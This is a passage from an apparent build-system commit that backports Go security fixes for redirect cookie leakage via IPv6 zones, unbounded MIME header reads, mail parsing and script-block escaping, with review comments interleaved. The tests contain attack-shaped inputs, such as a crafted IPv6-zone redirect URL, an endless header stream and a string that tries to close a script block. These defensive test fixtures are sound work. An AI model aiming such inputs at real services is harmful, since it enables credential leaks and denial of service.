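Review bot: `decrypt` builds the modulus with `modulusFromNat(natFromBig(priv.N))` and compares `c` against it before the `priv.N.Sign() == 0` test, so a zero modulus reaches the nat code ahead of the guard meant to reject it. What modulusFromNat does with a zero value is defined outside this hunk, but the guard can only protect if it runs first; moving `if priv.N.Sign() == 0 { return nil, ErrDecryption }` to the top of the function restores that. The doc comment `decrypt performs an RSA decryption of ciphertext into out.` also names an `out` parameter the function does not have. Suggest `// decrypt performs an RSA decryption of ciphertext and returns the plaintext, sized to the modulus.` instead.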
+@@ -554,9 +534,7 @@ func decryptAndCheck(random io.Reader, priv *PrivateKey, c *big.Int) (m *big.Int
+ // Encryption and decryption of a given message must use the same hash function
+ // and sha256.New() is a reasonable choice.
+ //
+-// The random parameter, if not nil, is used to blind the private-key operation
+-// and avoid timing side-channel attacks. Blinding is purely internal to this
+-// function – the random data need not match that used when encrypting.
++// The random parameter is legacy and ignored, and it can be as nil.
+ //
+ // The label parameter must match the value given when encrypting. See
+ // EncryptOAEP for details.
+@@ -570,9 +548,7 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ return nil, ErrDecryption
+ }
+
+- c := new(big.Int).SetBytes(ciphertext)
+-
+- m, err := decrypt(random, priv, c)
++ em, err := decrypt(priv, ciphertext)
+ if err != nil {
+ return nil, err
+ }
+@@ -581,10 +557,6 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ lHash := hash.Sum(nil)
+ hash.Reset()
+
+- // We probably leak the number of leading zeros.
+- // It's not clear that we can do anything about this.
+- em := m.FillBytes(make([]byte, k))
+-
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+
+ seed := em[1 : hash.Size()+1]
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
new file mode 100644
index 0000000000..13d3510504
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45289.patch
@@ -0,0 +1,121 @@
+From 20586c0dbe03d144f914155f879fa5ee287591a1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Thu, 11 Jan 2024 11:31:57 -0800
+Subject: [PATCH] [release-branch.go1.21] net/http, net/http/cookiejar: avoid
+ subdomain matches on IPv6 zones
+
+When deciding whether to forward cookies or sensitive headers
+across a redirect, do not attempt to interpret an IPv6 address
+as a domain name.
+
+Avoids a case where a maliciously-crafted redirect to an
+IPv6 address with a scoped addressing zone could be
+misinterpreted as a within-domain redirect. For example,
+we could interpret "::1%.www.example.com" as a subdomain
+of "www.example.com".
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes CVE-2023-45289
+Fixes #65385
+For #65065
+
+Change-Id: I8f463f59f0e700c8a18733d2b264a8bcb3a19599
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2131938
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173775
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569239
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/20586c0dbe03d144f914155f879fa5ee287591a1]
+CVE: CVE-2023-45289
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/client.go | 6 ++++++
+ src/net/http/client_test.go | 1 +
+ src/net/http/cookiejar/jar.go | 7 +++++++
+ src/net/http/cookiejar/jar_test.go | 10 ++++++++++
+ 4 files changed, 24 insertions(+)
+
+diff --git a/src/net/http/client.go b/src/net/http/client.go
+index a496f1c..2031834 100644
+--- a/src/net/http/client.go
++++ b/src/net/http/client.go
+@@ -973,6 +973,12 @@ func isDomainOrSubdomain(sub, parent string) bool {
+ if sub == parent {
+ return true
+ }
++ // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).
++ // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.
++ // For example, "::1%.www.example.com" is not a subdomain of "www.example.com".
++ if strings.ContainsAny(sub, ":%") {
++ return false
++ }
+ // If sub is "foo.example.com" and parent is "example.com",
+ // that means sub must end in "."+parent.
+ // Do it without allocating.
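Review bot: The added comment opens with `If sub contains a :` while the guard is `strings.ContainsAny(sub, ":%")`, so the `%` case is checked but not documented. Suggest `// If sub contains a : or %, it's probably an IPv6 address, possibly with a zone (and is definitely not a hostname).`, which also lets `a IPv6 zone` on the next line become `an IPv6 zone`. The `sub == parent` fast path above the guard still returns true for two identical IPv6 literals; that looks intended, but a short remark would stop a later reader from moving the guard up. isDomainOrSubdomain begins and ends outside this hunk.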
+diff --git a/src/net/http/client_test.go b/src/net/http/client_test.go
+index 2b4f53f..442fe35 100644
+--- a/src/net/http/client_test.go
++++ b/src/net/http/client_test.go
+@@ -1703,6 +1703,7 @@ func TestShouldCopyHeaderOnRedirect(t *testing.T) {
+ {"cookie2", "http://foo.com/", "http://bar.com/", false},
+ {"authorization", "http://foo.com/", "http://bar.com/", false},
+ {"www-authenticate", "http://foo.com/", "http://bar.com/", false},
++ {"authorization", "http://foo.com/", "http://[::1%25.foo.com]/", false},
+
+ // But subdomains should work:
+ {"www-authenticate", "http://foo.com/", "http://foo.com/", true},
+diff --git a/src/net/http/cookiejar/jar.go b/src/net/http/cookiejar/jar.go
+index 9f19917..18cbfc2 100644
+--- a/src/net/http/cookiejar/jar.go
++++ b/src/net/http/cookiejar/jar.go
+@@ -356,6 +356,13 @@ func jarKey(host string, psl PublicSuffixList) string {
+
+ // isIP reports whether host is an IP address.
+ func isIP(host string) bool {
++ if strings.ContainsAny(host, ":%") {
++ // Probable IPv6 address.
++ // Hostnames can't contain : or %, so this is definitely not a valid host.
++ // Treating it as an IP is the more conservative option, and avoids the risk
++ // of interpeting ::1%.www.example.com as a subtomain of www.example.com.
++ return true
++ }
+ return net.ParseIP(host) != nil
+ }
+
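Review bot: The doc comment `// isIP reports whether host is an IP address.` no longer matches the function, which now returns true for any string containing `:` or `%` whether or not `net.ParseIP` would accept it. Suggest `// isIP reports whether host is an IP address, or contains ':' or '%' and so cannot be a hostname.` The added inline comment also has two typos, `interpeting` and `subtomain`. A host that still carried a port would now be classified as an IP; how jarKey and other callers normalise the host is outside this hunk, so it is worth confirming that ports are stripped before this call.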
+diff --git a/src/net/http/cookiejar/jar_test.go b/src/net/http/cookiejar/jar_test.go
+index 47fb1ab..fd8d40e 100644
+--- a/src/net/http/cookiejar/jar_test.go
++++ b/src/net/http/cookiejar/jar_test.go
+@@ -251,6 +251,7 @@ var isIPTests = map[string]bool{
+ "127.0.0.1": true,
+ "1.2.3.4": true,
+ "2001:4860:0:2001::68": true,
++ "::1%zone": true,
+ "example.com": false,
+ "1.1.1.300": false,
+ "www.foo.bar.net": false,
+@@ -613,6 +614,15 @@ var basicsTests = [...]jarTest{
+ {"http://www.host.test:1234/", "a=1"},
+ },
+ },
++ {
++ "IPv6 zone is not treated as a host.",
++ "https://example.com/",
++ []string{"a=1"},
++ "a=1",
++ []query{
++ {"https://[::1%25.example.com]:80/", ""},
++ },
++ },
+ }
+
+ func TestBasics(t *testing.T) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
new file mode 100644
index 0000000000..ddc2f67c96
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
@@ -0,0 +1,271 @@
+From bf80213b121074f4ad9b449410a4d13bae5e9be0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 16 Jan 2024 15:37:52 -0800
+Subject: [PATCH] [release-branch.go1.21] net/textproto, mime/multipart: avoid
+ unbounded read in MIME header
+
+mime/multipart.Reader.ReadForm allows specifying the maximum amount
+of memory that will be consumed by the form. While this limit is
+correctly applied to the parsed form data structure, it was not
+being applied to individual header lines in a form.
+
+For example, when presented with a form containing a header line
+that never ends, ReadForm will continue to read the line until it
+runs out of memory.
+
+Limit the amount of data consumed when reading a header.
+
+Fixes CVE-2023-45290
+Fixes #65389
+For #65383
+
+Change-Id: I7f9264d25752009e95f6b2c80e3d76aaf321d658
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2134435
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173776
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569240
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf80213b121074f4ad9b449410a4d13bae5e9be0]
+CVE: CVE-2023-45290
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata_test.go | 42 +++++++++++++++++++++++++
+ src/net/textproto/reader.go | 48 ++++++++++++++++++++---------
+ src/net/textproto/reader_test.go | 12 ++++++++
+ 3 files changed, 87 insertions(+), 15 deletions(-)
+
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index c78eeb7..f729da6 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -421,6 +421,48 @@ func TestReadFormLimits(t *testing.T) {
+ }
+ }
+
++func TestReadFormEndlessHeaderLine(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ prefix string
++ }{{
++ name: "name",
++ prefix: "X-",
++ }, {
++ name: "value",
++ prefix: "X-Header: ",
++ }, {
++ name: "continuation",
++ prefix: "X-Header: foo\r\n ",
++ }} {
++ t.Run(test.name, func(t *testing.T) {
++ const eol = "\r\n"
++ s := `--boundary` + eol
++ s += `Content-Disposition: form-data; name="a"` + eol
++ s += `Content-Type: text/plain` + eol
++ s += test.prefix
++ fr := io.MultiReader(
++ strings.NewReader(s),
++ neverendingReader('X'),
++ )
++ r := NewReader(fr, "boundary")
++ _, err := r.ReadForm(1 << 20)
++ if err != ErrMessageTooLarge {
++ t.Fatalf("ReadForm(1 << 20): %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++type neverendingReader byte
++
++func (r neverendingReader) Read(p []byte) (n int, err error) {
++ for i := range p {
++ p[i] = byte(r)
++ }
++ return len(p), nil
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index ad2d777..cea6613 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -17,6 +17,10 @@ import (
+ "sync"
+ )
+
++// TODO: This should be a distinguishable error (ErrMessageTooLarge)
++// to allow mime/multipart to detect it.
++var errMessageTooLarge = errors.New("message too large")
++
+ // A Reader implements convenience methods for reading requests
+ // or responses from a text protocol network connection.
+ type Reader struct {
+@@ -38,13 +42,13 @@ func NewReader(r *bufio.Reader) *Reader {
+ // ReadLine reads a single line from r,
+ // eliding the final \n or \r\n from the returned string.
+ func (r *Reader) ReadLine() (string, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ return string(line), err
+ }
+
+ // ReadLineBytes is like ReadLine but returns a []byte instead of a string.
+ func (r *Reader) ReadLineBytes() ([]byte, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -53,7 +57,10 @@ func (r *Reader) ReadLineBytes() ([]byte, error) {
+ return line, err
+ }
+
+-func (r *Reader) readLineSlice() ([]byte, error) {
++// readLineSlice reads a single line from r,
++// up to lim bytes long (or unlimited if lim is less than 0),
++// eliding the final \r or \r\n from the returned string.
++func (r *Reader) readLineSlice(lim int64) ([]byte, error) {
+ r.closeDot()
+ var line []byte
+ for {
+@@ -61,6 +68,9 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ if err != nil {
+ return nil, err
+ }
++ if lim >= 0 && int64(len(line))+int64(len(l)) > lim {
++ return nil, errMessageTooLarge
++ }
+ // Avoid the copy if the first call produced a full line.
+ if line == nil && !more {
+ return l, nil
+@@ -93,7 +103,7 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ // A line consisting of only white space is never continued.
+ //
+ func (r *Reader) ReadContinuedLine() (string, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ return string(line), err
+ }
+
+@@ -114,7 +124,7 @@ func trim(s []byte) []byte {
+ // ReadContinuedLineBytes is like ReadContinuedLine but
+ // returns a []byte instead of a string.
+ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -127,13 +137,14 @@ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+ // returning a byte slice with all lines. The validateFirstLine function
+ // is run on the first read line, and if it returns an error then this
+ // error is returned from readContinuedLineSlice.
+-func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([]byte, error) {
++// It reads up to lim bytes of data (or unlimited if lim is less than 0).
++func (r *Reader) readContinuedLineSlice(lim int64, validateFirstLine func([]byte) error) ([]byte, error) {
+ if validateFirstLine == nil {
+ return nil, fmt.Errorf("missing validateFirstLine func")
+ }
+
+ // Read the first line.
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(lim)
+ if err != nil {
+ return nil, err
+ }
+@@ -161,13 +172,21 @@ func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([
+ // copy the slice into buf.
+ r.buf = append(r.buf[:0], trim(line)...)
+
++ if lim < 0 {
++ lim = math.MaxInt64
++ }
++ lim -= int64(len(r.buf))
++
+ // Read continuation lines.
+ for r.skipSpace() > 0 {
+- line, err := r.readLineSlice()
++ r.buf = append(r.buf, ' ')
++ if int64(len(r.buf)) >= lim {
++ return nil, errMessageTooLarge
++ }
++ line, err := r.readLineSlice(lim - int64(len(r.buf)))
+ if err != nil {
+ break
+ }
+- r.buf = append(r.buf, ' ')
+ r.buf = append(r.buf, trim(line)...)
+ }
+ return r.buf, nil
+@@ -512,7 +531,8 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+- line, err := r.readLineSlice()
++ const errorLimit = 80 // arbitrary limit on how much of the line we'll quote
++ line, err := r.readLineSlice(errorLimit)
+ if err != nil {
+ return m, err
+ }
+@@ -520,7 +540,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+
+ for {
+- kv, err := r.readContinuedLineSlice(mustHaveFieldNameColon)
++ kv, err := r.readContinuedLineSlice(maxMemory, mustHaveFieldNameColon)
+ if len(kv) == 0 {
+ return m, err
+ }
+@@ -541,7 +561,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ maxHeaders--
+ if maxHeaders < 0 {
+- return nil, errors.New("message too large")
++ return nil, errMessageTooLarge
+ }
+
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+@@ -567,9 +587,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+ maxMemory -= int64(len(value))
+ if maxMemory < 0 {
+- // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+- // to allow mime/multipart to detect it.
+- return m, errors.New("message too large")
++ return m, errMessageTooLarge
+ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3ae0de1..db1ed91 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -34,6 +34,18 @@ func TestReadLine(t *testing.T) {
+ }
+ }
+
++func TestReadLineLongLine(t *testing.T) {
++ line := strings.Repeat("12345", 10000)
++ r := reader(line + "\r\n")
++ s, err := r.ReadLine()
++ if err != nil {
++ t.Fatalf("Line 1: %v", err)
++ }
++ if s != line {
++ t.Fatalf("%v-byte line does not match expected %v-byte line", len(s), len(line))
++ }
++}
++
+ func TestReadContinuedLine(t *testing.T) {
+ r := reader("line1\nline\n 2\nline3\n")
+ s, err := r.ReadContinuedLine()
+--
+2.25.1
+
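Review bot: In the continuation loop of readContinuedLineSlice, an errMessageTooLarge returned by `r.readLineSlice(lim - int64(len(r.buf)))` falls into the existing `if err != nil { break }`, and the function then returns `r.buf, nil`. An over-limit continuation line is therefore not reported where the limit is hit; as far as the patch shows, the error only surfaces if a later read trips the limit again. Returning it directly with `if err == errMessageTooLarge { return nil, err }` ahead of the `break` would make the limit strict. That diverges from the upstream commit being backported, so it may be better raised upstream. Only part of readContinuedLineSlice is inside the patch's hunks.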
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
new file mode 100644
index 0000000000..e9d9d972b9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
@@ -0,0 +1,205 @@
+From 5330cd225ba54c7dc78c1b46dcdf61a4671a632c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 10 Jan 2024 11:02:14 -0800
+Subject: [PATCH] [release-branch.go1.22] net/mail: properly handle special
+ characters in phrase and obs-phrase
+
+Fixes a couple of misalignments with RFC 5322 which introduce
+significant diffs between (mostly) conformant parsers.
+
+This change reverts the changes made in CL50911, which allowed certain
+special RFC 5322 characters to appear unquoted in the "phrase" syntax.
+It is unclear why this change was made in the first place, and created
+a divergence from comformant parsers. In particular this resulted in
+treating comments in display names incorrectly.
+
+Additionally properly handle trailing malformed comments in the group
+syntax.
+
+For #65083
+Fixed #65849
+
+Change-Id: I00dddc044c6ae3381154e43236632604c390f672
+Reviewed-on: https://go-review.googlesource.com/c/go/+/555596
+Reviewed-by: Damien Neil <dneil@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/566215
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5330cd225ba54c7dc78c1b46dcdf61a4671a632c]
+CVE: CVE-2024-24784
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/net/mail/message.go | 30 +++++++++++++++------------
+ src/net/mail/message_test.go | 40 ++++++++++++++++++++++++++----------
+ 2 files changed, 46 insertions(+), 24 deletions(-)
+
+diff --git a/src/net/mail/message.go b/src/net/mail/message.go
+index af516fc30f470..fc2a9e46f811b 100644
+--- a/src/net/mail/message.go
++++ b/src/net/mail/message.go
+@@ -280,7 +280,7 @@ func (a *Address) String() string {
+ // Add quotes if needed
+ quoteLocal := false
+ for i, r := range local {
+- if isAtext(r, false, false) {
++ if isAtext(r, false) {
+ continue
+ }
+ if r == '.' {
+@@ -444,7 +444,7 @@ func (p *addrParser) parseAddress(handleGroup bool) ([]*Address, error) {
+ if !p.consume('<') {
+ atext := true
+ for _, r := range displayName {
+- if !isAtext(r, true, false) {
++ if !isAtext(r, true) {
+ atext = false
+ break
+ }
+@@ -479,7 +479,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ // handle empty group.
+ p.skipSpace()
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ return group, nil
+ }
+
+@@ -496,7 +498,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ return nil, errors.New("mail: misformatted parenthetical comment")
+ }
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ break
+ }
+ if !p.consume(',') {
+@@ -566,6 +570,12 @@ func (p *addrParser) consumePhrase() (phrase string, err error) {
+ var words []string
+ var isPrevEncoded bool
+ for {
++ // obs-phrase allows CFWS after one word
++ if len(words) > 0 {
++ if !p.skipCFWS() {
++ return "", errors.New("mail: misformatted parenthetical comment")
++ }
++ }
+ // word = atom / quoted-string
+ var word string
+ p.skipSpace()
+@@ -661,7 +671,6 @@ Loop:
+ // If dot is true, consumeAtom parses an RFC 5322 dot-atom instead.
+ // If permissive is true, consumeAtom will not fail on:
+ // - leading/trailing/double dots in the atom (see golang.org/issue/4938)
+-// - special characters (RFC 5322 3.2.3) except '<', '>', ':' and '"' (see golang.org/issue/21018)
+ func (p *addrParser) consumeAtom(dot bool, permissive bool) (atom string, err error) {
+ i := 0
+
+@@ -672,7 +681,7 @@ Loop:
+ case size == 1 && r == utf8.RuneError:
+ return "", fmt.Errorf("mail: invalid utf-8 in address: %q", p.s)
+
+- case size == 0 || !isAtext(r, dot, permissive):
++ case size == 0 || !isAtext(r, dot):
+ break Loop
+
+ default:
+@@ -850,18 +859,13 @@ func (e charsetError) Error() string {
+
+ // isAtext reports whether r is an RFC 5322 atext character.
+ // If dot is true, period is included.
+-// If permissive is true, RFC 5322 3.2.3 specials is included,
+-// except '<', '>', ':' and '"'.
+-func isAtext(r rune, dot, permissive bool) bool {
++func isAtext(r rune, dot bool) bool {
+ switch r {
+ case '.':
+ return dot
+
+ // RFC 5322 3.2.3. specials
+- case '(', ')', '[', ']', ';', '@', '\\', ',':
+- return permissive
+-
+- case '<', '>', '"', ':':
++ case '(', ')', '<', '>', '[', ']', ':', ';', '@', '\\', ',', '"': // RFC 5322 3.2.3. specials
+ return false
+ }
+ return isVchar(r)
+diff --git a/src/net/mail/message_test.go b/src/net/mail/message_test.go
+index 1e1bb4092f659..1f2f62afbf406 100644
+--- a/src/net/mail/message_test.go
++++ b/src/net/mail/message_test.go
+@@ -385,8 +385,11 @@ func TestAddressParsingError(t *testing.T) {
+ 13: {"group not closed: null@example.com", "expected comma"},
+ 14: {"group: first@example.com, second@example.com;", "group with multiple addresses"},
+ 15: {"john.doe", "missing '@' or angle-addr"},
+- 16: {"john.doe@", "no angle-addr"},
++ 16: {"john.doe@", "missing '@' or angle-addr"},
+ 17: {"John Doe@foo.bar", "no angle-addr"},
++ 18: {" group: null@example.com; (asd", "misformatted parenthetical comment"},
++ 19: {" group: ; (asd", "misformatted parenthetical comment"},
++ 20: {`(John) Doe <jdoe@machine.example>`, "missing word in phrase:"},
+ }
+
+ for i, tc := range mustErrTestCases {
+@@ -436,24 +439,19 @@ func TestAddressParsing(t *testing.T) {
+ Address: "john.q.public@example.com",
+ }},
+ },
+- {
+- `"John (middle) Doe" <jdoe@machine.example>`,
+- []*Address{{
+- Name: "John (middle) Doe",
+- Address: "jdoe@machine.example",
+- }},
+- },
++ // Comment in display name
+ {
+ `John (middle) Doe <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John (middle) Doe",
++ Name: "John Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
++ // Display name is quoted string, so comment is not a comment
+ {
+- `John !@M@! Doe <jdoe@machine.example>`,
++ `"John (middle) Doe" <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John !@M@! Doe",
++ Name: "John (middle) Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
+@@ -788,6 +786,26 @@ func TestAddressParsing(t *testing.T) {
+ },
+ },
+ },
++ // Comment in group display name
++ {
++ `group (comment:): a@example.com, b@example.com;`,
++ []*Address{
++ {
++ Address: "a@example.com",
++ },
++ {
++ Address: "b@example.com",
++ },
++ },
++ },
++ {
++ `x(:"):"@a.example;("@b.example;`,
++ []*Address{
++ {
++ Address: `@a.example;(@b.example`,
++ },
++ },
++ },
+ }
+ for _, test := range tests {
+ if len(test.exp) == 1 {
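Review bot: The patch header has no `---` separator between the `Signed-off-by:` trailer and the diffstat, unlike CVE-2023-45290.patch and CVE-2024-24785.patch added in this same commit. Tools that split the commit message from the patch body at `---` will treat the diffstat as part of the message. Adding a `---` line directly after `Signed-off-by: Ashish Sharma <asharma@mvista.com>` keeps the header consistent with the sibling patches.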
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
new file mode 100644
index 0000000000..1398a2ca48
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
@@ -0,0 +1,197 @@
+From 3643147a29352ca2894fd5d0d2069bc4b4335a7e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 14 Feb 2024 17:18:36 -0800
+Subject: [PATCH] [release-branch.go1.21] html/template: escape additional
+ tokens in MarshalJSON errors
+
+Escape "</script" and "<!--" in errors returned from MarshalJSON errors
+when attempting to marshal types in script blocks. This prevents any
+user controlled content from prematurely terminating the script block.
+
+Updates #65697
+Fixes #65968
+
+Change-Id: Icf0e26c54ea7d9c1deed0bff11b6506c99ddef1b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/564196
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit ccbc725f2d678255df1bd326fa511a492aa3a0aa)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/567515
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/3643147a29352ca2894fd5d0d2069bc4b4335a7e]
+CVE: CVE-2024-24785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 22 ++++++++-
+ src/html/template/js_test.go | 96 ++++++++++++++++++++----------------
+ 2 files changed, 74 insertions(+), 44 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 35994f0..4d3b25d 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -171,13 +171,31 @@ func jsValEscaper(args ...interface{}) string {
+ // cyclic data. This may be an unacceptable DoS risk.
+ b, err := json.Marshal(a)
+ if err != nil {
+- // Put a space before comment so that if it is flush against
++ // While the standard JSON marshaller does not include user controlled
++ // information in the error message, if a type has a MarshalJSON method,
++ // the content of the error message is not guaranteed. Since we insert
++ // the error into the template, as part of a comment, we attempt to
++ // prevent the error from either terminating the comment, or the script
++ // block itself.
++ //
++ // In particular we:
++ // * replace "*/" comment end tokens with "* /", which does not
++ // terminate the comment
++ // * replace "</script" with "\x3C/script", and "<!--" with
++ // "\x3C!--", which prevents confusing script block termination
++ // semantics
++ //
++ // We also put a space before the comment so that if it is flush against
+ // a division operator it is not turned into a line comment:
+ // x/{{y}}
+ // turning into
+ // x//* error marshaling y:
+ // second line of error message */null
+- return fmt.Sprintf(" /* %s */null ", strings.ReplaceAll(err.Error(), "*/", "* /"))
++ errStr := err.Error()
++ errStr = strings.ReplaceAll(errStr, "*/", "* /")
++ errStr = strings.ReplaceAll(errStr, "</script", `\x3C/script`)
++ errStr = strings.ReplaceAll(errStr, "<!--", `\x3C!--`)
++ return fmt.Sprintf(" /* %s */null ", errStr)
+ }
+
+ // TODO: maybe post-process output to prevent it from containing
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index de9ef28..3fc3baf 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "bytes"
+ "math"
+ "strings"
+@@ -104,61 +105,72 @@ func TestNextJsCtx(t *testing.T) {
+ }
+ }
+
++type jsonErrType struct{}
++
++func (e *jsonErrType) MarshalJSON() ([]byte, error) {
++ return nil, errors.New("beep */ boop </script blip <!--")
++}
++
+ func TestJSValEscaper(t *testing.T) {
+ tests := []struct {
+- x interface{}
+- js string
++ x interface{}
++ js string
++ skipNest bool
+ }{
+- {int(42), " 42 "},
+- {uint(42), " 42 "},
+- {int16(42), " 42 "},
+- {uint16(42), " 42 "},
+- {int32(-42), " -42 "},
+- {uint32(42), " 42 "},
+- {int16(-42), " -42 "},
+- {uint16(42), " 42 "},
+- {int64(-42), " -42 "},
+- {uint64(42), " 42 "},
+- {uint64(1) << 53, " 9007199254740992 "},
++ {int(42), " 42 ", false},
++ {uint(42), " 42 ", false},
++ {int16(42), " 42 ", false},
++ {uint16(42), " 42 ", false},
++ {int32(-42), " -42 ", false},
++ {uint32(42), " 42 ", false},
++ {int16(-42), " -42 ", false},
++ {uint16(42), " 42 ", false},
++ {int64(-42), " -42 ", false},
++ {uint64(42), " 42 ", false},
++ {uint64(1) << 53, " 9007199254740992 ", false},
+ // ulp(1 << 53) > 1 so this loses precision in JS
+ // but it is still a representable integer literal.
+- {uint64(1)<<53 + 1, " 9007199254740993 "},
+- {float32(1.0), " 1 "},
+- {float32(-1.0), " -1 "},
+- {float32(0.5), " 0.5 "},
+- {float32(-0.5), " -0.5 "},
+- {float32(1.0) / float32(256), " 0.00390625 "},
+- {float32(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {float64(1.0), " 1 "},
+- {float64(-1.0), " -1 "},
